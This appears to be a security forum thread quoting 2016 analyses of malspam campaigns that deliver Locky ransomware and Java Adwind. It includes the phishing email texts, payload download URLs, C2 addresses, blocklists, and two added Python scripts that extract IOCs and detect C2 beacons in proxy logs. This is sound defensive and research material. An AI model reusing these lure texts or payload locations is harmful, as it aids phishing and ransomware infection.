SPAM frauds, fakes, and other MALWARE deliveries...

Fake 'Document', 'Neopost documents', 'Clients accounts' SPAM, Locky C2

FYI...

Fake 'Document' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/docu...ccounts-your-own-email-domain-delivers-locky/
28 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Document No 25845584' (random numbers) pretending to come from random names at accounts@ your-own-email-domain or company with a random named zip attachment containing an hta file... One of the emails looks like:
From: random names at accounts@your own email domain or company
Date: Wed 28/09/2016 01:38
Subject: Document No 25845584
Attachment: Document No 25845584.zip
Thanks for using electronic billing
Please find your document attached
Regards
MAVIS CAWLEY


28 September 2016: Document No 25845584.zip: Extracts to: GVJL2720.hta - Current Virus total detections 16/55*
MALWR** was unable to get any payload or find any download sites. Payload Security*** shows a download of an encrypted filedatalinks .ir/g76vub8 which is transformed by the script to a working Locky binary. (Unfortunately Payload Security does not show the actual file or allow it to be downloaded in the free web version)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...5b45cc66ab881f9148c5f75d/analysis/1475037203/

** https://malwr.com/analysis/Yzk5OTE2NmIxMDlmNDIzYmE2ZjRmYWI5MjI0NmZiZTg/

*** https://www.hybrid-analysis.com/sam...0f45b45cc66ab881f9148c5f75d?environmentId=100
Contacted Hosts
144.76.172.200
52.24.123.95
52.85.209.134
52.33.248.56
128.241.90.219

___

Locky download and C2 locations ...
- http://blog.dynamoo.com/2016/09/locky-download-and-c2-locations-2016-09.html
28 Sep 2016 - "It's one of those days where I haven't been able to look at Locky much, but here is some analysis of download locations from my usual trusted source.
Binary download locations:
(Long list of domain names at the dynamoo URL above.)...
C2s:
176.103.56.98/apache_handler.php (PE Ivanov Vitaliy Sergeevich aka xserver.ua, Ukraine)
194.67.208.69/apache_handler.php [hostname: billy676.myihor.ru] (Marosnet, Russia)
46.8.45.169/apache_handler.php [hostname: grant.zomro.com] (Zomro, Russia)
kgijxdracnyjxh .biz/apache_handler.php [69.195.129.70] (Joe's Datacenter, US)
rluqypf .pw/apache_handler.php [86.110.118.114] (Takewyn.com, Russia)
ehkhxyvvcpk .biz/apache_handler.php [45.63.98.158] (Vultr Holdings, UK)
ufyjlxiscap .info/apache_handler.php
kdbbpmrdfnlno .pl/apache_handler.php
jlhxyspgvwcnjb .work/apache_handler.php
dceaordeoe .ru/apache_handler.php
gisydkcsxosyokkuv .work/apache_handler.php
mqlrmom .work/apache_handler.php
wfgtoxqbf .biz/apache_handler.php
ndyevynuwqe .su/apache_handler.php
vgcfwrnfrkkarc .work/apache_handler.php
Recommended blocklist:
176.103.56.98
194.67.208.69
46.8.45.169
86.110.118.114
45.63.98.158
"
___

Fake 'Neopost documents' SPAM - Locky – Odin version
- https://myonlinesecurity.co.uk/neopost-documents-0000888121970-malspam-leads-to-locky-odin-version/
28 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Neopost documents' 0000888121970 coming as usual from random companies, names and email addresses with a random named zip attachment containing a WSF file...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/09/neopost-1024x730.png

28 September 2016: 0000888121970_statement_000088812197051.zip: Extracts to: ZQSA4705.wsf
Current Virus total detections 9/54*. MALWR** shows a download of an encrypted file from one of these locations:
http ://bigballsincowtown .com/67fgbcni?gjGmIb=KpIHjmIwkWU
http ://lucianasaliani .com/67fgbcni?gjGmIb=KpIHjmIwkWU
which is transformed by the script to aCOldXqKQqm2.dll (VirusTotal 6/57***) posts back to C&C
http ://194.67.208.69 /apache_handler.php - Payload Security[4] shows a lot more C2 connections... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...a222bd24af2cb6e696dcfaa7/analysis/1475081527/

** https://malwr.com/analysis/Yjg1Yzg5MzQyMDEwNDIwMWE3NjM1ZWY5NTJjMzA0NGE/
Hosts
69.89.27.246
174.127.104.173
70.40.220.107
176.103.56.98
194.67.208.69


*** https://www.virustotal.com/en/file/...de638ea5b5572ee7f7a02d50/analysis/1475077530/

4] https://www.hybrid-analysis.com/sam...0c0a222bd24af2cb6e696dcfaa7?environmentId=100
Contacted Hosts
69.89.27.246
174.127.104.173
176.103.56.98
194.67.208.69
45.63.98.158
86.110.118.114

___

Something evil on 69.64.63.77
- http://blog.dynamoo.com/2016/09/something-evil-on-69646377.html
28 Sep 2016 - "This appears to be some sort of exploit kit leveraging hacked sites, for example:
[donotclick]franchidiscarpa[.]com/index.php
--> [donotclick]j8le7s5q745e[.]org/files/vip.php?id=4
You can see this EK infecting a legitimate site in this URLquery report*. The IP address appears to be a customer of ServerYou... Country: UA ...
These other domains are hosted on the same IP:
[donotclick]j8le7s5q745e .org
[donotclick]3wdev4pqfw1u .org
[donotclick]fg1238tq38le .net
All of those domains are registered to:
.. Registrant Country: RU ...
It looks like there might be a fair amount of activity to the IP at the moment, judging by the number of URLquery reports, so it might well be worth blocking."
* http://urlquery.net/report.php?id=1475082161540
77.81.224.215: https://www.virustotal.com/en/ip-address/77.81.224.215/information/

69.64.63.77: https://www.virustotal.com/en/ip-address/69.64.63.77/information/
>> https://www.virustotal.com/en/url/f...89ceba6bf5a63e77d0973816f3f44ca9a84/analysis/
___

Fake 'Clients accounts' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/clients-accounts-malspam-delivers-locky/
27 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Clients accounts' coming as usual from random companies, names and email addresses with a random named zip attachment containing a wsf file... One of the emails looks like:
From: Lon Kane <Kane.84@ fixed-189-180-187-189-180-32.iusacell .net>
Date: Thu 01/09/2016 19:22
Subject:Clients accounts
Attachment: a966ea5acc18.zip
Dear monika.griffithe,
I attached the clients’ accounts for your next operation.
Please look through them and collect their data. I expect to hear from you soon.
Lon Kane
VP Finance & Controller ...


27 September 2016: a966ea5acc18.zip: Extracts to: Clients accounts 32C58E xls.wsf
Current Virus total detections 8/55*. MALWR**... Payload Security*** shows a download of an encrypted file from
techskillscenter .net/zenl0z which is transformed by the script to 2Ez76BlaytMAH.dll (VirusTotal 6/57[4]) Unusually, Payload Security describes this dll file as informative, rather than malicious, which would normally mean it has some sort of anti-analysis/sandbox protection to it... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...9b4a815dbebc0b67f4199394/analysis/1474996887/

** https://malwr.com/analysis/YTU5OWRkMGIzN2JlNGMwNmI5MTIzYWZkYjY3MTE0MDI/
Hosts
213.205.40.169
186.202.126.199
81.169.145.224
158.69.147.88
66.85.27.250


*** https://www.hybrid-analysis.com/sam...d419b4a815dbebc0b67f4199394?environmentId=100
Contacted Hosts
173.247.251.145
5.196.200.247
94.242.55.225
86.110.118.114
69.195.129.70


4] https://www.virustotal.com/en/file/...02d84f5350bc2ae6e40418b6/analysis/1474997682/

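Added example (not from the original post or the dynamoo/myonlinesecurity write-ups quoted above): the C2 lists and "Recommended blocklist" sections above are pasted with the usual defanging (a space before the TLD, "http ://", "[donotclick]", "[.]"), so they can't be dropped straight into a proxy or DNS blocklist. The Python below refangs text in that format and pulls out the IPs and domains, skipping the hosting-provider rDNS names in "[hostname: ...]", the provider annotations in parentheses, file names such as 2Ez76BlaytMAH.dll, and the analysis-site links (VirusTotal, Malwr, Hybrid Analysis, urlquery). The REFERENCE_HOSTS and FILE_EXTENSIONS sets are my own assumptions, and SAMPLE_POST is constructed from indicator lines quoted in this post.

```python
from __future__ import annotations
import re

# Assumption: hosts that appear in these write-ups only as analysis/reference links, never as indicators.
REFERENCE_HOSTS = {
    "virustotal.com", "malwr.com", "hybrid-analysis.com", "urlquery.net",
    "myonlinesecurity.co.uk", "dynamoo.com",
}
# Assumption: "name.ext" tokens with these suffixes are file names in the posts, not domains.
FILE_EXTENSIONS = {"hta", "wsf", "js", "zip", "rar", "dll", "exe", "xls", "doc", "php", "jar", "png"}

IPV4 = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
DOMAIN = re.compile(r"\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,})\b", re.I)


def refang(text: str) -> str:
    """Undo the defanging conventions used in the quoted posts."""
    text = text.replace("[donotclick]", "")
    text = text.replace("[.]", ".").replace("(.)", ".")
    text = re.sub(r"hxxp(s?)://", r"http\1://", text, flags=re.I)
    text = re.sub(r"(https?)\s*:\s*//", r"\1://", text, flags=re.I)          # "http ://x" -> "http://x"
    text = re.sub(r"(?<=[A-Za-z0-9-])\s+\.(?=[A-Za-z]{2,}\b)", ".", text)   # "name .biz" -> "name.biz"
    text = re.sub(r"(?<=[A-Za-z0-9])\s+/(?=[A-Za-z0-9_])", "/", text)       # "1.2.3.4 /path" -> "1.2.3.4/path"
    return text


def is_reference_host(domain: str) -> bool:
    return any(domain == h or domain.endswith("." + h) for h in REFERENCE_HOSTS)


def extract_iocs(post_text: str) -> dict[str, list[str]]:
    """Return {'ips': [...], 'domains': [...]} found in a defanged forum/blog excerpt."""
    text = re.sub(r"\[hostname:[^\]]*\]", " ", post_text)  # provider rDNS names are not C2 hosts
    text = re.sub(r"\([^)]*\)", " ", text)                 # "(Marosnet, Russia)" style annotations
    text = refang(text)
    ips = set(IPV4.findall(text))
    domains = set()
    for dom in DOMAIN.findall(text):
        dom = dom.lower()
        if dom.rsplit(".", 1)[1] in FILE_EXTENSIONS or is_reference_host(dom):
            continue
        domains.add(dom)
    return {
        "ips": sorted(ips, key=lambda ip: tuple(int(o) for o in ip.split("."))),
        "domains": sorted(domains),
    }


def render_blocklist(iocs: dict[str, list[str]]) -> str:
    """One indicator per line, IPs first, the way the 'Recommended blocklist' sections are laid out."""
    return "\n".join(iocs["ips"] + iocs["domains"])


# Constructed sample: indicator lines quoted in this post, in the posts' own defanged style.
SAMPLE_POST = """\
C2s:
176.103.56.98/apache_handler.php (PE Ivanov Vitaliy Sergeevich aka xserver.ua, Ukraine)
194.67.208.69/apache_handler.php [hostname: billy676.myihor.ru] (Marosnet, Russia)
kgijxdracnyjxh .biz/apache_handler.php [69.195.129.70] (Joe's Datacenter, US)
rluqypf .pw/apache_handler.php [86.110.118.114] (Takewyn.com, Russia)
mqlrmom .work/apache_handler.php
C2 is http ://194.67.208.69 /apache_handler.php - Payload Security shows more.
[donotclick]franchidiscarpa[.]com/index.php
--> [donotclick]j8le7s5q745e[.]org/files/vip.php?id=4
download of an encrypted file from techskillscenter .net/zenl0z which is transformed to 2Ez76BlaytMAH.dll
* https://www.virustotal.com/en/file/abc/analysis/1475037203/
** https://malwr.com/analysis/Yzk5OTE2NmIxMDlmNDIzYmE2ZjRmYWI5MjI0NmZiZTg/
"""

if __name__ == "__main__":
    print(render_blocklist(extract_iocs(SAMPLE_POST)))
```

Run it against a saved copy of a post and feed the output to your blocklist. The hosting-provider rDNS names and the provider annotations are stripped on purpose: xserver.ua or billy676.myihor.ru are where a C2 happens to live, not indicators, and blocking them would hit unrelated customers.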
Fake 'Bill', 'Debit Card blocked', 'Receipt', 'New Order' SPAM

FYI...

Fake 'Bill' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/09/malware-spam-bill-for-documents-bill.html
29 Sep 2016 - "This spam leads to Locky ransomware. The samples I have seen have no body text, but have subjects in the format:
Bill for documents 31564-29-09-2016
Bill for parcel 08388-28-09-2016
Bill for papers 657-29-09-2016


Each subject has a random number appended by the date. Attached is a RAR archive file with a name similar to Bill 657-29-09-2016.rar containing a malicious .js script which downloads...
(Many domain-names listed at the dynamoo URL above.)
The malware then phones home to the following servers:
194.67.208.69/apache_handler.php (Marosnet, Russia)
89.108.83.45/apache_handler.php (Agava, Russia)
Payload detection for the version analysed was 16/56* but there could be an updated payload by now.
Recommended blocklist:
194.67.208.69
89.108.83.45
"
* https://www.virustotal.com/en/file/...94ee182384b02bb723ad0cd5322e4044a00/analysis/

- https://myonlinesecurity.co.uk/bill-for-documents-57608-28-09-2016-malspam-delivers-locky-odin/
29 Sep 2016 - "... Locky downloaders with a series of blank/empty emails with the basic subject of 'Bill for documents' 57608-28-09-2016 pretending to come from no-reply @ random companies, with a semi-random named .rar attachment containing a .JS file. These are using the new .Odin file extension on the encrypted files.. The MALWR report* shows contact with an attempted download of .Net framework and some sort of mapping... The subjects vary with each email. They all start with 'Bill for' and then either documents, papers or parcel, then a series of random numbers and the date, looking something like:
Bill for documents 57608-28-09-2016
Bill for papers 9341672-28-09-2016
Bill for parcel 422-29-09-2016


... One of the emails looks like:
From: no-reply@ simplyorganic .com
Date: Thu 29/09/2016 00:44
Subject: Bill for documents 57608-28-09-2016
Attachment: Bill 57608-28-09-2016.rar


Body content: totally blank

29 September 2016: Bill 57608-28-09-2016.rar: Extracts to: Bill 5100-4868433109.js
Current Virus total detections 8/53**. MALWR* shows a download of an encrypted file from one of these locations:
http ://g2cteknoloji .com/8g74crec?rnhaXNpMuW=MWIKgpzUlE which is transformed by the script to ErUxQjD1.dll
(VirusTotal 9/57***). It also shows C2 on http ://89.108.83.45 /apache_handler.php and various other script files. Payload Security[4] shows a few other C2 servers... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://malwr.com/analysis/YmI0YzExZGVjZTcxNGJmOTllMzAxMzQ1ZWMyYWMyNWQ/
Hosts
185.26.144.135
194.67.208.69
89.108.83.45


** https://www.virustotal.com/en/file/...73546aa764018af430ee2097/analysis/1475114609/

*** https://www.virustotal.com/en/file/...02bb723ad0cd5322e4044a00/analysis/1475120852/

4] https://www.hybrid-analysis.com/sam...11873546aa764018af430ee2097?environmentId=100
Contacted Hosts
185.26.144.135
89.108.83.45
194.67.208.69
45.63.98.158
69.195.129.70
52.42.26.69
52.84.40.221

___

Fake 'Debit Card blocked' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/09/malware-spam-temporarily-blocked-leads.html
29 Sep 2016 - "The attachment on this spam email leads to Locky ransomware:
From: "Ambrose Clements"
Subject: Temporarily blocked
Date: Thu, 29 Sep 2016 13:37:53 +0400
Dear [redacted]
this is to inform you that your Debit Card is temporarily blocked as there were unknown transactions made today.
We attached the scan of transactions. Please confirm whether you made these transactions.


Attached is a ZIP file with a name similar to debit_card_93765d0d7.zip containing a malicious .WSF script with a random name. These scripts (according to my source) download...
(Many domain names listed at the dynamoo URL above.)
The decoded malware then phones home to:
195.123.210.11/apache_handler.php [hostname: by-f.org] (Mobicom Ltd, Latvia)
91.200.14.93/apache_handler.php [hostname: ef4bykov.example.com] (SKS-LUGAN, Ukraine)
185.117.155.20/apache_handler.php [hostname: v-jc.pro] (Marosnet, Russia)
xpcwwlauo .pw/apache_handler.php [hostname: vjc.kz] [91.234.33.132] (FOP Sedinkin Olexandr Valeriyovuch aka thehost .ua, Ukraine)
gqackht .biz/apache_handler.php [hostname: vjc.kz] [91.234.33.132] (FOP Sedinkin Olexandr Valeriyovuch aka thehost .ua, Ukraine)
bgldptjuwwq .org/apache_handler.php
cxnlxkdkxxxt .xyz/apache_handler.php
rcahcieii .work/apache_handler.php
uxaoooxqqyuslylw .click/apache_handler.php
vwktvjgpmpntoso .su/apache_handler.php
upsoxhfqut .work/apache_handler.php
nqchuuvgldmxifjg .click/apache_handler.php
ofoclobdcpeeqw .biz/apache_handler.php
kfvigurtippypgw .pl/apache_handler.php
toescilgrgvtjcac .work/apache_handler.php
Recommended blocklist:
195.123.210.11
91.200.14.93
185.117.155.20
91.234.33.132
"

- https://myonlinesecurity.co.uk/your-debit-card-is-temporarily-blocked-malspam-delivers-locky/
29 Sep 2016 - "... Locky downloaders.. an email with the subject of 'Temporarily blocked' coming as usual from random companies, names and email addresses with a random named zip attachment containing a .WSF file... One of the emails looks like:
From: Jarvis Mason <Mason.2892@ paneltek .ca>
Date: Thu 01/09/2016 19:22
Subject: Temporarily blocked
Attachment: debit_card_4b69ba102.zip
Dear [redacted],
this is to inform you that your Debit Card is temporarily blocked as there were unknown transactions made today.
We attached the scan of transactions. Please confirm whether you made these transactions.
King regards,
Jarvis Mason
Technical Manager – Online Banking ...


1 September 2016: ea00debit_card_4b69ba102.zip: Extracts to: debit card details 92CF6066.wsf
Current Virus total detections 6/54*. Payload Security** shows a download of an encrypted file from
fhgmediaent .com/66aslu which is transformed by the script to 1lenb5SzGBo0mpu.dll (VirusTotal 10/57***)...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...82b162ab20766f0b2aa0e62a/analysis/1475140581/

** https://www.hybrid-analysis.com/sam...c5482b162ab20766f0b2aa0e62a?environmentId=100
Contacted Hosts
23.227.132.66
91.200.14.93
195.123.210.11
185.117.155.20
91.234.33.132


*** https://www.virustotal.com/en/file/...b493f48ed843c0ee10bd4122/analysis/1475141313/
___

Fake 'Receipt' xls SPAM - Locky
- http://blog.dynamoo.com/2016/09/malware-spam-receipt-103-526-receiptxls.html
29 Sep 2016 - "This spam leads to Locky ransomware:
From rosalyn.gregory@ gmail .com
Date Thu, 29 Sep 2016 21:07:46 +0800
Subject Receipt 103-526


I cannot tell if there is any body text, however there is an -attachment- Receipt.xls which contains malicious code... that in the case of the sample I analysed downloads a binary from:
opmsk .ru/g76ub76
There will be -many- other download locations too. Automated analysis [1] [2] shows that this is Locky ransomware phoning home to:
89.108.83.45/apache_handler.php (Agava, Russia)
91.200.14.93/apache_handler.php [hostname: ef4bykov .example .com] (SKS-LUGAN, Ukraine)
xpcwwlauo .pw/apache_handler.php [hostname: vjc .kz] [91.234.33.132] (FOP Sedinkin Olexandr Valeriyovuch aka thehost .ua, Ukraine)
A malicious DLL is dropped with a detection rate of 6/57*. Malicious IPs and domains overlap quite a bit with this earlier attack**. This version of Locky encrypts files with a .odin extension...
Recommended blocklist:
89.108.83.45
91.200.14.93
91.234.33.132
"
1] https://malwr.com/analysis/ZGRhZWJjNDY0MjI3NGRjYmJmNTFlNjJjYmZhNTUyN2I/
Hosts
85.17.31.113
89.108.83.45


2] https://www.hybrid-analysis.com/sam...5bd043c6ee9439fd947c10cc2d8?environmentId=100
Contacted Hosts
85.17.31.113
91.200.14.93
89.108.83.45
195.123.210.11
91.234.33.132


* https://www.virustotal.com/en/file/...4ca008b1a29cfbf631f19135/analysis/1475156266/

** http://blog.dynamoo.com/2016/09/malware-spam-temporarily-blocked-leads.html
___

Fake 'New Order' SPAM - delivers Java Adwind
- https://myonlinesecurity.co.uk/new-order-claudia-schmiesing-delivers-java-adwind/
29 Sep 2016 - "We continue to see Java Adwind Trojans daily... This one is an email with the subject of 'New Order' pretending to come from Claudia Schmiesing <claudia.schmiesing@ gmx .net> with a fuzzy unclear embedded image, that has a link hidden behind it, that when-clicked downloads a zip file containing a Java.jar file. This particular version is very badly detected. Java Adwind is normally quite well detected on Virus Total...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/09/new-order-Claudia-Schmiesing-1024x695.png

29 September 2016: flwfbq.zip: Extracts to: ORDER.jar - Current Virus total detections 4/55*. MALWR**

This is another one of the files that, unless you have "show known file extensions" enabled, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/...317bf7def048819f4798f814/analysis/1475172675/

** https://malwr.com/analysis/MWNkNzg3YzQ4MDQ5NDViNDkzMjUzNjZkODJlNWI3Mzg/
Hosts
23.105.131.212

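Added example, not part of the original post or of the blogs it quotes: every Locky C2 listed in these write-ups is reached by a POST to /apache_handler.php, very often on a bare IP rather than a hostname. The Python below runs that detection over a few constructed proxy log lines and pairs each beacon with the stage-1 download the same client made just before it. The log format, the "POST to a raw IPv4 host with a .php path" heuristic and the 100 KB size threshold are my assumptions, not anything the posts state; the g2cteknoloji .com download location and the two C2 IPs come from the 'Bill' write-up above, while the 10.0.0.x clients and 203.0.113.9 are made up.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlsplit

C2_PATH = "/apache_handler.php"        # check-in path on every Locky C2 listed in the posts above
MIN_PAYLOAD_BYTES = 100_000            # assumption: the stage-1 download is at least this large
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Assumption: a simple proxy log format "ts client method url status content-type bytes".
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST|HEAD|PUT|CONNECT) (\S+) (\d{3}) (\S+) (\d+)$")


@dataclass
class Event:
    ts: datetime
    client: str
    method: str
    url: str
    status: int
    ctype: str
    size: int


def parse_line(line: str) -> Event | None:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, ctype, size = m.groups()
    return Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, method, url,
                 int(status), ctype, int(size))


def is_locky_checkin(ev: Event) -> bool:
    """High confidence: POST to the exact C2 path seen across all the campaigns above."""
    return ev.method == "POST" and urlsplit(ev.url).path == C2_PATH


def is_raw_ip_php_post(ev: Event) -> bool:
    """Lower confidence (assumption): POST to a bare IPv4 host with a .php path and no hostname."""
    u = urlsplit(ev.url)
    return ev.method == "POST" and bool(IPV4_HOST.match(u.hostname or "")) and u.path.endswith(".php")


def detect(lines: list[str], window: timedelta = timedelta(minutes=5)) -> list[dict]:
    events = [e for e in map(parse_line, lines) if e is not None]
    alerts = []
    for ev in events:
        if is_locky_checkin(ev):
            rule = "locky-c2-path"
        elif is_raw_ip_php_post(ev):
            rule = "post-to-raw-ip-php"
        else:
            continue
        # Pair the beacon with the stage-1 download: a large successful GET by the same client just before.
        stage1 = [p for p in events
                  if p.client == ev.client and p.method == "GET" and p.status == 200
                  and p.size >= MIN_PAYLOAD_BYTES and ev.ts - window <= p.ts < ev.ts]
        alerts.append({
            "client": ev.client,
            "c2": urlsplit(ev.url).hostname,
            "rule": rule,
            "stage1_download": stage1[-1].url if stage1 else None,
        })
    return alerts


# Constructed log lines: the download host and the two C2 IPs are from the 'Bill' write-up above,
# the client addresses and 203.0.113.9 are made up.
SAMPLE_LOG = """\
2016-09-29T10:14:02Z 10.0.0.23 GET http://g2cteknoloji.com/8g74crec?rnhaXNpMuW=MWIKgpzUlE 200 application/octet-stream 188416
2016-09-29T10:14:05Z 10.0.0.23 POST http://89.108.83.45/apache_handler.php 200 text/html 4120
2016-09-29T10:14:06Z 10.0.0.23 POST http://194.67.208.69/apache_handler.php 200 text/html 4120
2016-09-29T10:15:31Z 10.0.0.41 GET http://www.example.com/index.html 200 text/html 3200
2016-09-29T10:16:00Z 10.0.0.41 POST http://www.example.com/login.php 302 text/html 0
2016-09-29T10:20:12Z 10.0.0.57 POST http://203.0.113.9/gate.php 200 text/html 512
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The path-based rule is the one to trust; the raw-IP rule will need tuning on a real network (some update agents and internal tools post to bare IPs too). Note that the "no C2" Locky variant mentioned in later posts never beacons at all, so on those the only signal is the stage-1 download itself.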
Fake 'Receipt', 'Parcel details' SPAM

FYI...

Fake 'Receipt' SPAM - delivers Locky – Odin
- https://myonlinesecurity.co.uk/rand...ome-from-gmail-addresses-delivers-locky-odin/
30 Sep 2016 - "The Locky ransomware malware gang appear to be copying Dridex this week and going back to using word docs with embedded macros to deliver the ransomware... Locky downloaders.. a blank/empty email with the subject of 'Receipt' 45019-0740 (random numbers) pretending to come from random names at gmail .com with a random named word doc. The doc attachment name matches the subject line... One of the emails looks like:
From: chandra.har?@ gmail .com
Date: Fri 30/09/2016 10:12
Subject: Receipt 45019-0740
Attachment: Receipt 45019-0740.doc


Body content: Totally Blank/Empty

30 September 2016: Receipt 45019-0740.doc - Current Virus total detections 9/55*
.. MALWR** shows a download of an encrypted file from http ://travelinsider .com.au/021ygs7
which is transformed by the script to hupoas.dll (VirusTotal 8/57***). C2 is
http ://149.202.52.215 /apache_handler.php. Payload Security[4] shows multiple additional C2 sites. Neither online sandbox actually shows any Locky screenshots today, but Malwr clearly shows odin files in the lists... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...9f18e9cad7b454cbcfa142ff/analysis/1475226679/

** https://malwr.com/analysis/ZTNmNmYwNWIxZDE2NDFiZTk0NzhkMzRjNjkxNjdmNWE/
Hosts
203.98.84.123
89.108.83.45
149.202.52.215


*** https://www.virustotal.com/en/file/...9e802828a19c787bb3f53bda/analysis/1475227548/

4] https://www.hybrid-analysis.com/sam...cf99f18e9cad7b454cbcfa142ff?environmentId=100
Contacted Hosts
203.98.84.123
89.108.83.45
91.200.14.93
149.202.52.215
185.43.4.143

___

Fake 'Parcel details' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/another-dhl-cannot-deliver-your-parcel-malspam-delivers-locky/
30 Sep 2016 - "... Locky downloaders.. an email pretending to be a DHL cannot deliver message with the subject of 'Parcel details' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with DHL_parcel containing a WSF file... fake/spoofed DHL (and other delivery companies) malspam emails... One of the emails looks like:
From: DHL <Phelps.0827@ parket-ekonom .ru>
Date: Fri 30/09/2016 10:48
Subject: Parcel details
Attachment: DHL_parcel_06cda564b.zip
Dear berkeley,
We couldn’t deliver your parcel on September 30th because we couldn’t verify the given address.
Attached is the shipment label. Please print it out to take the parcel from our office.
Label-ID: acd8e33709cb62ea9825f9de779d1dfb8f6b566af6779b11928a9e053f
Best Wishes,
Reyes Phelps
DHL Express Service


30 September 2016: DHL_parcel: Extracts to: DHL parcel 25514DCA.wsf - Current Virus total detections 7/55*
.. MALWR** seems unable to decode/decrypt these very heavily obfuscated scripting files. Payload Security*** shows a download of an encrypted file from fernandoarias .org/tmlvg7el which is transformed by the script to
a working Locky file... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...d3bec5bebe27343a97689e61/analysis/1475228984/

** https://malwr.com/analysis/NTQzM2YzMmI1YTdiNDc3YzkyZDVlYzZkODA4ZmU2YjE/

*** https://www.hybrid-analysis.com/sam...7ccd3bec5bebe27343a97689e61?environmentId=100
Contacted Hosts
91.186.0.7
52.34.245.108
52.222.157.47
52.41.235.21


Fake 'Scan', 'please sign' SPAM

FYI...

Fake 'Scan' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-scan-2016-1003-152626-sent.html
3 Oct 2016 - "This -fake- document scan leads to Locky ransomware:
From: DAMON ASHBROOK
Date: 3 October 2016 at 10:56
Subject: [Scan] 2016-1003 15:26:26
--
Sent with Genius Scan for iOS.


The name of the sender, the subject and the attachment name (in this case 2016-1003 15-26-26.xls) will vary somewhat. This Malwr analysis* shows some of the infection in action. Overall my sources tell me that the various malicious macros download...
(Long list of domain-names listed at the dynamoo URL above.)
C2 locations are:
149.202.52.215/apache_handler.php (OVH, France)
217.12.199.244/apache_handler.php (ITL, Ukraine)
logwudorlghdou .info/apache_handler.php
krmwgapkey .work/apache_handler.php
hruicryqytbmc .xyz/apache_handler.php
vswaagv .org/apache_handler.php
smskymrtssawsjb .org/apache_handler.php
wvandssbv .org/apache_handler.php
ytxsbkfjmyxglvt .click/apache_handler.php
rqybmggvssutf .xyz/apache_handler.php
qaemlwlsvqvgcmbke .click/apache_handler.php
btlyarobjohheg .ru/apache_handler.php
civjvjrjjlv .pw/apache_handler.php
xlarkvixnlelbsvxl .xyz/apache_handler.php
A DLL is dropped with a detection rate of 19/57**.
Recommended blocklist:
149.202.52.215
217.12.199.244
"
* https://malwr.com/analysis/MzdlZjhkOGE3Njk3NDRjNjhkNjFiN2I1YzIyZWZkNGI/
Hosts
69.89.29.98
149.202.52.215


** https://www.virustotal.com/en/file/...abe1b282f26314c769c1f68e/analysis/1475489696/
___

Fake 'please sign' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-please-sign-leads-to-locky.html
3 Oct 2016 - "This -fake- financial spam leads to Locky ransomware:
Subject: please sign
From: Ricardo Buchanan
Date: Monday, 3 October 2016, 10:27
Hi [redacted],
I have made the paperwork you asked me to prepare two days ago.
Please check the attachment. It just needs your signature.
Best Wishes,
Ricardo Buchanan
CEO


In the only sample I have seen so far, the attachment name is paperwork_scan_7069f18e6.zip containing a malicious script paperwork scan ~1EB91.wsf plus a junk file with a single letter name... obfuscated script... appears to download Locky ransomware. Analysis is pending.
UPDATE: This Hybrid Analysis* clearly shows Locky in action. According to my sources there are no C2s..."
(Long list of domain-names at the dynamoo URL above.)
* https://www.hybrid-analysis.com/sam...a5c061ae66a0536ede587633b61?environmentId=100
Contacted Hosts
65.49.80.83
165.246.165.245
52.34.245.108
52.85.184.19
63.245.215.95


- https://myonlinesecurity.co.uk/lots-and-lots-of-locky-this-monday-morning/
3 Oct 2016 - "... loads of Locky today. We are seeing multiple subjects, emails and attachments. We are seeing XLS files and the typical .wsf files inside zips... email looks like:
From: KIETH WOOLDRIDGE <kieth.wooldridge.61@ kimiabiosciences .com> (random senders)
Date: Mon 03/10/2016 08:45
Subject: [Scan] 2016-1003 12:14:45
Attachment: 2016-1003 12-14-45.xls

Sent with Genius Scan for iOS.


... (another) version is:
From: Anita Ramsey <Ramsey.663@ equestrianarts .org> (random senders)
Date: Mon 03/10/2016 09:51
Subject: please sign
Attachment: paperwork_scan_35886e2.zip extracts to paperwork scan ~D45D50C5.wsf
Hi [redacted],
I have made the paperwork you asked me to prepare two days ago.
Please check the attachment. It just needs your signature.
Best Wishes,
Anita Ramsey
Head of Corporate Relations


MALWR [1] [2] [3] | VirusTotal [4][5][6] downloads from
http ://mmm2.aaomg .com/jhg45s and http ://crossroadspd .com/jhg45s which will be converted to siluans.dll
(Virustotal 14/57*) or from ossiatzki .com/dyke9 which is converted to MMCnbLicrHhc.dll (virusTotal 14/57**)..
Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
